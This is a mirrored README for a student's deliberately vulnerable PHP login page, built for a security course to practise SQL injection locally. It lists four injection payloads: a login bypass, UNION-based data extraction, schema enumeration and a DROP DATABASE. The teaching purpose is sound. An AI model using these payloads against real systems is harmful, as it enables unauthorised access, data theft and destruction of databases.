Code Monkey home page Code Monkey logo

sql-inject-dummy's Introduction

SQL Injection Dummy Target - README

Welcome to the SQL Injection Dummy Target repository! This project was created as part of my Information Systems Security course assignment, allowing users to experience simulated SQL injection attacks in a controlled environment.

Features

  • Simulated Attacks: Explore and understand SQL injection vulnerabilities through a safe and controlled environment.
  • Interactive Learning: Learn about potential database security risks and how to prevent them by interacting with the dummy target.
  • Visual Representation: Check out the project's preview image below.

Preview

Installation

  1. Clone this repository to your local machine using git clone https://github.com/fintisalsabila/sql-injection-dummy.git.
  2. Set up a local server environment (e.g., XAMPP, WAMP, or similar) to run PHP scripts.

Usage

  1. Configure your local server to host the project.
  2. Access the project via your browser by navigating to http://localhost/sql-injection-dummy.

Code for attacking this web :

  • SELECT * FROM users WHERE username = '' AND password = '' OR 1=1 --
  • SELECT * FROM users WHERE username = '' UNION ALL SELECT *, 1 FROM info_penting --
  • SELECT * FROM users WHERE username = '' UNION ALL SELECT table_name, 1, 1 FROM information_schema.tables WHERE table_schema=database() --
  • SELECT * FROM users WHERE username = '' DROP DATABASE security_challenge --

Technologies Used

  • PHP
  • HTML
  • CSS

Thank you for visiting my repository! Feel free to explore, learn, and experiment with SQL injection attacks safely. If you have any questions or feedback, please don't hesitate to reach out. Enjoy your learning journey!

sql-inject-dummy's People

Contributors

fintisalsabila avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.